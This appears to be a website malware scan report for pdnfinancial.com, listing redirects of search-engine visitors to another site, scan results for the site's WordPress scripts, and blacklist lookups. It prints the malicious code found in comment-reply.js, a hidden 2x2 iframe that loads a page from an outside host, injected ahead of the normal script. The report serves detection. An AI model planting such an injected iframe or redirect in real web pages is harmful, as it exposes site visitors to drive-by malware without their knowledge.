Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://www.pdnfinancial.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: www.pdnfinancial.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Mar 2015 05:47:19 GMT Location: http://gabriellerosephotography.com/emas.html?h=1230337 Server: Apache Content-Length: 309 Content-Type: text/html; charset=iso-8859-1 | malicious |
URL: http://gabriellerosephotography.com/emas.html?h=1230337 (imitation of visitor from search engine) GET /emas.html?h=1230337 HTTP/1.1 Host: gabriellerosephotography.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Thu, 12 Mar 2015 05:47:20 GMT Location: http://just15.justhost.com/suspended.page/disabled.cgi/gabriellerosephotography.com?h=1230337 Server: Apache Content-Length: 355 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://www.pdnfinancial.com/ | 200 OK Content-Length: 18964 Content-Type: text/html | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery-1.7.2.min.js?ver=1.7.2 | 200 OK Content-Length: 94917 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/wp-e-commerce.js?ver=3.8.8.5.571548 | 200 OK Content-Length: 27244 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/jquery.infieldlabel.min.js?ver=3.8.8.5.571548 | 200 OK Content-Length: 1787 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/ajax.js?ver=3.8.8.5.571548 | 200 OK Content-Length: 2693 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/index.php?wpsc_user_dynamic_js=true&ver=3.8.8.5.571548 | 200 OK Content-Length: 1028 Content-Type: text/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-admin/js/jquery.livequery.js?ver=1.0.3 | 200 OK Content-Length: 6714 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/user.js?ver=3.8.8.5571548 | 200 OK Content-Length: 14672 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/plugins/wp-e-commerce/wpsc-core/js/thickbox.js?ver=Instinct_e-commerce | 200 OK Content-Length: 14444 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/modernizr.custom.all.min.js?ver=2.5.2 | 200 OK Content-Length: 15245 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/css3MediaQueries.min.js?ver=1.0.0 | 200 OK Content-Length: 14106 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery.easing.min.js?ver=1.3.0 | 200 OK Content-Length: 3759 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-includes/js/comment-reply.js?ver=3.4.1 | 200 OK Content-Length: 959 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1230337></iframe>');
addComment={moveForm:function(d,f,i,c){var m=this,a,h=m.I(d),b=m.I(i),l=m.I("cancel-comment-reply-link"),j=m.I("comment_parent"),k=m.I("comment_post_ID");if(!h||!b||!l||!j){return}m.respondId=i;c=c||false;if(!m.I("wp-temp-form-div")){a=document.createElement("div");a.id="wp-temp-form-div";a.style.display="none";b.parentNode.insertBefore(a,b)}h.parentNode.insertBefore(b,h.nextSibling);if(k&&c){k.value=c}j.value=f;l.style.display="";l.onclick=function(){var n=addComment,e=n.I("wp-temp-form-div"),o=n.I(n.respondId);if(!e||!o){return}n.I("comment_parent").value="0";e.parentNode.insertBefore(o,e);e.parentNode.removeChild(e);this.style.display="none";this.onclick=null;return false};try{m.I("comment").focus()}catch(g){}return false},I:function(a){return document.getElementById(a)}}; Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1230337 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1230337> | ||
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery.prettyPhoto.min.js?ver=3.1.2 | 200 OK Content-Length: 23645 Content-Type: application/javascript | clean |
http://www.pdnfinancial.com/wp-content/themes/oakland/js/jquery.script.js?ver=1.0.0 | 200 OK Content-Length: 40722 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pdnfinancial.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pdnfinancial.com/
Result: pdnfinancial.com is not infected or malware details are not published yet.
Result: pdnfinancial.com is not infected or malware details are not published yet.